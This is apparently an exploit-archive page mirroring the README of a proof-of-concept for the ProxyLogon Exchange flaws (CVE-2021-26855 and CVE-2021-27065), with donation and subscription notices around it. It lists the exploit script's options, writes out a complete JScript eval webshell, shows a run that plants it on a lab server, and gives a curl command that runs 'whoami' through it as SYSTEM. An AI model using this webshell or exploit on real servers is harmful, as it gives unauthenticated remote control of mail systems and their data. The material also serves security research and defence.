Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-26855 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Source
https://github.com/praetorian-inc/proxylogon-exploit
Associated Vulnerability
Title:Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
Description:Microsoft Exchange Server Remote Code Execution Vulnerability
Description
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
Readme
# proxylogon

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which allows for
unauthenticated remote code execution on Microsoft Exchange as described in the
following resources:

* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers
* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities
* https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

## Usage

Exploitation requires knowledge of the frontend Exchange server URL (e.g.
`https://exchange.example.org`) and an email address for a user on the system.
The admin SID and backend can be leaked from the server.

```
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
  [--webshell WEBSHELL] [--path PATH]
  [--backend BACKEND]
  [--proxy PROXY]

proxylogon proof-of-concept

optional arguments:
  -h, --help           show this help message and exit
  --frontend FRONTEND  external url to exchange (e.g. https://exchange.example.org)
  --email EMAIL        valid email on the target machine
  --sid SID            exchange admin sid
  --webshell WEBSHELL  webshell to upload
  --path PATH          desired path to webshell on host
  --backend BACKEND    [optional] backend host (leaked in X-CalculatedBETarget)
  --proxy PROXY        [optional] proxy traffic (e.g. http://127.0.0.1:8080)
```

## Example

```
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF

$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
  --email administrator@hafnium.local \
  --webshell webshell.aspx \
  --path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!

$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
  -d 'kxpprfgvnosz=Response.Write(
    new ActiveXObject("WScript.Shell")
      .Exec("cmd /c whoami")
      .StdOut
      .ReadAll()
);' | head -n 1
nt authority\system
```
File Snapshot

 [4.0K]  /data/pocs/f3d49719a80b23c1e496a32e85483c5ebfbe94d6
├── [8.3K]  exploit.py
├── [ 11K]  LICENSE
├── [2.4K]  README.md
└── [   8]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →